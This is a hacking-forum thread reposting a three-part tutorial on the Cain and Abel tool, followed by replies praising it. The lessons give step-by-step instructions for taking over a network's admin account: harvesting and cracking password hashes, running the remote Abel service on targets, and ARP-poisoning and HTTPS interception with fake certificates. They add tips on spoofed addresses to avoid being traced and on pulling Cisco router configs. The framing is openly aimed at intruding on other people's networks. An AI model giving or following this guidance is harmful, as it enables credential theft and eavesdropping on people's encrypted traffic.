Complete Cain and Able tutorial

DON'T post new tutorials here! Please use the "Pending Submissions" board so the staff can review them first.
Post Reply
User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Complete Cain and Able tutorial

Post by Still_Learning »

Lesson 1::

This tutorial will cover (version 4.9.8)

INTRODUCTION

Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.

we need to accomplish the following steps to get the admin account:

1. Enumerate the computers on the network

2. connect to a computer and install the Abel remote app

3. Harvest user account information

4. Crack user account information passwords to get the admin account

5. Login to the target machine with the admin account

6. Install the Abel service on the target server

7. Harvest all of the hashes from a server and sent to the cracker

Once we have the admin account on the server, the rest is up to you.


First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you have multiple network cards, it might be useful to know what your MAC address is for your primary connection or the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. enter the “CMD”

4. A black window will appear

5. Enter the following information into the window without the quotes

“Ipconfig /all” and then Enter

6. Determine which one of the Ethernet adapters you are using and copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the device with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration Dialog Box. Here is a brief description of each tab and its configuration:

Sniffer Tab: allows the user to specify the Ethernet interface and the start up options for the sniffer and ARP features of the application.

ARP Tab: Allows the user to in effect to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to you workstation. Keep in mind that servers and routers and designed for multiple high capacity connections. If the device that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down and even come to a halt. This will surly lead to your detection and eventual demise as a hacker as the event is easily detected and tracked with the right equipment.

Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on one of the services you will be able to change both the TCP and UDP ports. But this will not be necessary for this tutorial, but will be useful future tutorials.

HTTP Fields: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer and ARP-HTTPS will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP and passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console: This is the command prompt on the remote machine. Anything that you can do on your pc from the CMD prompt can be done from here. Examples include mapping a drive back to your pc and copying all the files from the target or adding local users to the local security groups or anything really. With windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes with further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally), the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE \SECURITY\Policy\Secrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihommed on two different networks.

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM but the process is slower and with few exceptions the NTLM and NT passwords are the same and NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, and two numbers.)

Dictionary Cracking process

Click start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click exit and then look at the NT password column. All of the passwords cracked will show up next to the now <insert your name here> owned accounts.
Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Resort your hashes so single out the accounts that you have left to crack. Now select all of the un-cracked or guessed accounts and right click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go pretty quick. Take a second to review your progress and look for additional patterns.

At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you have gotten any admin level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time consuming. Any time saver applications that you can find will be helpful.

Bruting

Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be extremely time consuming. Look closely at all of the passwords that you have cracked and look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts and follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is because that is due nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8 field on how many characters to specify in the password length pull down box. Make your selection and have at it. 123749997 years to completion. If you see this, then you should rethink the need for this account. However, working with the application, rainbow tables and password generators can help your narrow down to reasonable time frames to get the job done.

Some definition

MAC: Media Access Control - In computer networking a media access control address (MAC address) is a code on most forms of networking equipment that allows for that device to be uniquely identified. Each manufacturer for Network Cards has been assigned a predefined range or block of numbers.

Sniffing: Sniffing is the act or process of “Listening” to some or all of the information that is being transmitted on the same network segment that a device is on. On an OSI Model Layer 1 network, even the most basic Sniffers are capable of “hearing” all of the traffic that is sent across a LAN. Moving to a Layer 2 network complicates the process somewhat, however tools like Cain allow for the spanning of all ports to allow the exploitation of layer 2 switched networks.

ARP: Address Resolution Protocol – Address Resolution Protocol; a TCP/IP function for associating an IP address with a link-level address. Understanding ARP and its functions and capabilities are key skills for hackers and security professionals alike. A basic understanding of ARP is necessary to properly utilize all of the functions that Cain is capable of.

------------
Author: arbu
original link:

Code: Select all

www.thehackerslibrary.com
Gone

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

LESSON 2:::

Author: Arbu

ARP Poison Routing
APR-HTTPS

APR

APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination.

ARP Poison Attack
This kind of attack is based on the manipulation of host’s ARP caches. On an Ethernet/IP network when two hosts want to communicate to each other they must know each others MAC addresses. The source host looks at its ARP table to see if there is a MAC address corresponding to the destination host IP address. If not, it broadcasts an ARP Request to the entire network asking the MAC of the destination host. Because this packet is sent in broadcast it will reach every host in a subnet however only the host with the IP address specified in the request will reply its MAC to the source host. On the contrary if the ARP-IP entry for the destination host is already present in the ARP cache of the source host, that entry will be used without generating ARP traffic.
Manipulating ARP caches of two hosts, it is possible to change the normal direction of traffic between them. This kind of traffic hijacking is the result of an ARP Poison attack and also a prerequisite to achieve a “Man-in-the-Middle” condition between victim hosts. The term Main-in-the-Middle refers to the fact that the traffic between hosts follows an obligated path through something before reaching the desired destination.

Re-Routing Packets
Now suppose that you successfully setup an ARP Poison attack between two hosts to intercept their network traffic. To do so you had specified the sniffer MAC address in ARP Poison packets and now you are forcing the two hosts to communicate through your computer.


In this situation the sniffer receives packets that are directed to its MAC address but not to its IP address so the protocol stack discards these packets causing a Denial of Service between the hosts. To avoid such problems the sniffer must be able to re-route poisoned packets to the correct destination. (You can’t capture any password if hosts cannot communicate)

Prerequisites
In order to re-route poisoned packets to the correct destination, the program must know each IP-MAC association of victim hosts. This is why the user is asked to scan for MAC addresses first.

Configuration
This feature needs the configuration of some parameters that can be set from the configuration dialog. It is possible to specify a spoofed MAC and IP addresses to be used in ARP Poison packets; this makes it very difficult to trace back to the origin of the attack because attacker’s real addresses are never sent across the network. On switched networks, the attack is also a stealth one from a central point of view because Cain’s APR uses Unicast Ethernet destination addresses in ARP Poison packets; these packets will be routed by switches accordingly to their CAM tables and never sent in broadcast.

Image

apr

Victim hosts can be selected from the APR Tab using the + button in the toolbar:

The meaning of this selection is: “I want to hijack all IP traffic that flows from host 192.168.0.1 and host 192.168.0.10 in each direction so that my workstation will be in a Man-in-the-Middle condition between them”. In this way the program is configured to perform an ARP Poison attack directed to the selected hosts and at the same time the association needed to re-route poisoned packets is created. Cain’s APR has been developed to handle attacks on multiple hosts at the same time so you can choose in the right list a pool of addresses.

The attack can now be enabled/disabled using the relative toolbar button;

APR Views
You can monitor the traffic activity from the two views under the APR sub TAB. The upper view (LAN View) shows the number of re-routed packets between poisoned hosts and also the routing direction of the packets. It can happen that for some reason (static ARP entries for example) the attack is successful for one host only; in this case you will see the number of re-routed packets rising for one direction only meaning that the sniffer is processing half of the traffic expected.

The lower view (WAN View) shows the number of re-routed packets directed to or coming from an IP address which is external to the current subnet. If one of the two hosts is a router it is possible that Cain’s APR will process WAN traffic too; in this case the lower list will be automatically populated with associations for WAN traffic.

When poisoning a router the following considerations arise:

- If you setup APR to hijack IP traffic between an internal host and its default gateway you will automatically intercept traffic from that host and all other hosts present in external networks connected by that gateway.

- When APR receives a packet originated from an internal host and directed to an IP address which is external to the current subnet it must re-route that packet to the correct gateway which is unknown.
The destination IP address present in the packet is the one of an external host and the destination Ethernet address is our sniffer MAC address….. the question arises as to where to re-route this packet if there are multiple exit point (gateways) in our LAN ? The packet could be sent in broadcast but this works only with routers, I checked that Checkpoint Firewalls for example discards packets directed to Unicast IP addresses encapsulated in frames with broadcast MAC addresses. when APR does not know where to re-route packets it will use the best route found in the local operating system’s route table.
If your LAN uses asymmetric routing you can modify the local route table using the Route Table Manager to avoid the above problem.

- Poisoning the subnet’s default gateway with all other hosts in the LAN can cause traffic bottlenecks because APR does not have the same performance of an high speed router.

- Default gateways addresses are usually virtual addresses generated by HSRP or VRRP routing protocols. Consider if you are poisoning a normal host and the default gateway virtual address…
In this case a packet originated outside the local network and directed to an internal host will reach the sniffer but this packet could contain the real MAC address of the active HSRP / VRRP host as Ethernet source address. Because this source MAC address is not the one you setup in the APR list, the packet will not be re-routed by APR causing DoS. When you want to poison HSRP / VRRP virtual addresses you have to poison also real addresses of HSRP/ VRRP members.
APR WAN Status

arp-view

Image

Each entry present in the WAN list can reach the following status:

- Broadcasting: This state means that APR received a packet from a host that resides on a different network and directed to an IP address of your broadcast domain. That packet must be routed by APR but the correct destination MAC address is not present in the host list. In this situation APR will broadcast that packet to all hosts in your LAN.

- Half-Routing: This state means that APR is routing the traffic correctly but only in one direction (ex: Client->Server or Server->Client). This can happen if one of the two hosts cannot be poisoned or if asymmetric routing is used on the LAN. In this state the sniffer looses all packets in an entire direction so it cannot grab authentications that use a challenge-response mechanism.

- Full-Routing: This state means that the IP traffic between two hosts has been completely hijacked and APR is working in FULL-DUPLEX. (e.g.: ServerClient). The sniffer will grab authentication information accordingly to the filters set.

APR-HTTPS enables the capture and the decryption of HTTPS traffic between hosts. It works in conjunction with Cain’s Certificate Collector to inject fake certificates into SSL sessions, previously hijacked by mean of APR. Using this trick it is possible to decrypt encrypted data before it arrives to the real destination performing a what so called Man-in-the-Middle attack.

Image

Be warned that clients will notice this kind of attack because the server’s certificate file injected into the SSL session is a fake one and although it is very similar to the real one it is not signed by a trusted certification authority. When the victim client starts a new HTTPS session, his browser shows a pop-up dialog warning about the problem

security alert

APR-HTTPS uses the certificate files manipulated by the Certificate Collector. They contains the same parameters of the real ones except for asymmetric encryption keys; this deceives a lot of users to accept the server certificate and continue with the session.

Image

certificate

The lower list in the APR-HTTPS tab contains all the session files that have been captured during the Man-in-the-Middle attack; decrypted data is saved in these text files located under the “HTTPS” subdirectory of the main installation folder

fake certificate

Image

How it works
Cain’s HTTPS sniffer works in FULL-DUPLEX CLIENT-SIDE STEALTH mode; both server and client traffic is decrypted and if spoofing is enabled the attacker’s IP and MAC addresses are never exposed to the victim client. Connections are accepted by a local “acceptor” socket listening on HTTPS port defined in the configuration dialog; this socket handle hijacked client connections but only when APR is enabled. OpenSSL libraries are used to manage SSL communications over two more sockets, one used for the traffic between the client Cain and the other used for the traffic between Cain server.

This is how all works step by step:

1) The HTTPS filter is enabled by the user in the configuration dialog
2) APR is enabled by the user using the button on the toolbar -> the Man-in-the-Middle attack is ready
3) The victim client starts a new session to an HTTPS enabled server (e.g. https://xyz.com)
4) Packets from the client are hijacked by APR and captured by Cain’s sniffer by mean of Winpcap driver
5) APR-HTTPS search for a fake certificate associated to the requested server in the Certificate Collector; if present the certificate will be used if not it will be automatically downloaded, properly modified and stored locally for future usage .
6) Packets from the victim are modified so that they are re-directed to the local acceptor socket; modifications are made on MAC addresses, IP addresses and TCP source ports (Port Address Translation “PAT” is used to handle multiple connections). The data captured is then sent again into the network using Winpcap but it is this time addressed to the local socket that will accept the Client-side connection.
7) The Server-side socket is created and connected to the real server requested by the victim.
8) OpenSSL libraries are used to manage encryption on both sockets using the fake certificate victim-side and the real certificate sever-side.
9) Packets sent by the Client-side socket are modified again to reach the victim’s host.
10) Data coming from the server is decrypted, saved to session files, re-encrypted and sent to the victim host by mean of the Client-side socket.
11) Data coming from the client is decrypted, saved to session files, re-encrypted and sent to the server by mean of the Server-side socket.

Although it can be noticed from the fake certificate file used, this kind of attack is STEALTH from a client point of view because the victim thinks to be connected to the real server; try a “netstat -an” on the client to check yourself.

Once decrypted, traffic from the client is also sent to the HTTP sniffer filter for a further analysis on credentials. You can take a look at the data saved in session files by APR-HTTPS here.
Prerequisites
This feature needs APR to be enabled and a Man-in-the-Middle condition between the HTTPS server and the victim host.

Limitations
This feature does not work like a PROXY server; because of the usage of the Winpcap driver it cannot decrypt HTTPS sessions initiated from the local host.

Usage
After you successfully set up APR and enabled the HTTPS sniffer filter, sessions are automatically saved in the HTTPS subdirectory and can be viewed using the relative function within the list pop up menu.
Gone

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

Lesson 3::::::

Author: Abru

original link

Code: Select all

http://www.thehackerslibrary.com/?p=440

-----------------------------------------

This part of the tutorial will contain

Certificates Collector

Cisco Config Downloader/Uploader

Mac Scanner

Certificates Collector

Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake certificate files. Why fake ? because the program will replace asymmetric encryption keys in these files with new ones generated locally. In this way the APR-HTTPS will be able to encrypt/decrypt HTTPS traffic in a Man-in-the-Middle condition between victim APR’s hosts.

A fake certificate is self-signed by Cain so the client’s browser is supposed to pop up a dialog to notify that it comes from an untrusted certification authority; however because all other parameters within the certificate remain the same as the real ones a lot of users simply does not care about this warning.

[img]http://www.thehackerslibrary.com/wp-content/uploads/2008/12/11-259x300.jpg[/img]

certificate

Fake certificates are stored in the “Certs” subdirectory of the program’s installation path and the list of those currently available to APR-HTTPS is maintained in the file CERT.LST in the program’s directory. You can manually modify this list file to instruct Cain’s APR-HTTPS to inject the certificate of your choice into connections from APR’s victims computers to a given HTTPS server address.

[img]http://www.thehackerslibrary.com/wp-content/uploads/2008/12/21-300x171.jpg[/img]

fake certificate application

Usage

The feature is used automatically by the HTTPS sniffer filter. You can use the + button on the toolbar to manually grab and prepare a list of fake certificates; non standard ports can be specified using the syntax “hostname:port” or “ip address:port”.

Cisco Config Downloader/Uploader

This feature allows you to download or upload the configuration file of Cisco devices via SNMP/TFTP. It supports routers and switches that uses the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB; for more information about those MIBs please refer to Cisco web site.

How it works

1) Cain requests the configuration file transfer to the Cisco device using the SNMP protocol. Request packets are constructed using some proprietary Cisco OIDs that the vendor provides for this functionality; they also contains other parameters like the protocol type, the server IP address and filenames to instruct the device on where to send or to take its configuration file.

2) At this point the device starts the file transfer using the protocol specified in the request (set to TFTP for simplicity).

3) Cain opens a TFTP socket in listening mode and handles the file transfer. A TFTP server is NOT required, when uploading the program sends the configuration file to the device, when downloading it receives it.

Usage

To download a configuration from a device press the “Insert” button on the keyboard or click the icon with the blue + on the toolbar, provide the IP address of the SNMP enabled device and the right Read/Write Community string. To upload a configuration use the relative function within the list pop up menu.

Limitations

This feature will not work if network restrictions, like ACLs or firewall rules, for interested protocols (SNMP/TFTP) are set. The TFTP file transfer is initiated by the device itself so dynamic NAT between you and the device is a problem as well.

Requirements

- CCDU works on Cisco Routers and Switches that supports the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB. PIX Firewalls does not support those MIBs.

- You also need the right Read/Write SNMP community string (e.g.: “private”), the Read-Only one is not enough.

MAC Scanner

The MAC address scanner is a very fast IP to MAC address resolver based on ARP Request/Reply packets. It takes as input a range of IP addresses on the current subnet and resolves the MAC addresses associated to those IP’s. The scanner includes an OUI database, providing MAC vendor’s information, this feature is useful to quickly identify switches, routers, load balancers and firewalls present in the LAN.

[img]http://www.thehackerslibrary.com/wp-content/uploads/2008/12/mac-scanner-300x144.jpg[/img]

mac-scanner

Because of the use of ARP packets that cannot cross routers or VLANs, this feature can resolve MAC addresses in the local broadcast domain only. The OUI database is a normalized version of the IEEE OUI list available at this link: http://standards.ieee.org/regauth/oui/index.shtml.

Once active hosts are found, you can also resolve their host names with the “Resolve Host Name” function within the list pop up menu.
Tip

The scanner cannot resolve MAC addresses if the network card is not correctly configured. You also have to check the APR’s spoofing options in the configuration dialog before initiating a scan.
Prerequisites

The sniffer must be activated.
Usage

The scanner’s configuration dialog is activated pressing the “Insert” button on the keyboard or click the icon with the blue + on the toolbar; then you have to select the range of IP addresses to resolve.

CREDITS-CAIN and ABEL ITSELF
Gone

User avatar
computathug
Administrator
Administrator
Posts: 2693
Joined: 29 Mar 2007, 16:00
17
Location: UK
Contact:

Post by computathug »

brilliantly written piece of work there buddy.

I will read more when i have time which will be after the new year.

Nice one
:wink:

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

The original author is by abru. I did not write it, but it is an awesome tutorial, should be stickied :wink:
Gone

User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
18
Location: Michigan USA
Contact:

Post by DNR »

Good job mate.

**DNR uses some sticky budz to stick-y the thread
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

User avatar
ph0bYx
Staff Member
Staff Member
Posts: 2039
Joined: 22 Sep 2008, 16:00
15
Contact:

Post by ph0bYx »

exactly what I'm looking for :D
HnY!

User avatar
Still_Learning
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
15
Location: Trigger City

Post by Still_Learning »

DNR wrote:Good job mate.

**DNR uses some sticky budz to stick-y the thread
Thanks my first tutorial sticky! woo hoo
Last edited by Still_Learning on 03 Jan 2009, 13:33, edited 1 time in total.
Gone

User avatar
Nooh
Newbie
Newbie
Posts: 6
Joined: 20 Dec 2008, 17:00
15
Location: Pakistan
Contact:

Post by Nooh »

Now that is what i call C 8O 8O L
Very Nice S.L.

But one thing, where can i find this version Arbu is talking about i.e; 4.9.8
I've got 4.9.25 from their site.
And in your download's section its very old one.
Regards, Nuh
Every one wants to go to Heaven , But Nobody wants to die..fact isnt it ?

I\'m not laughing WITH you, i\'m laughing AT you

Protect your REPT.

Post Reply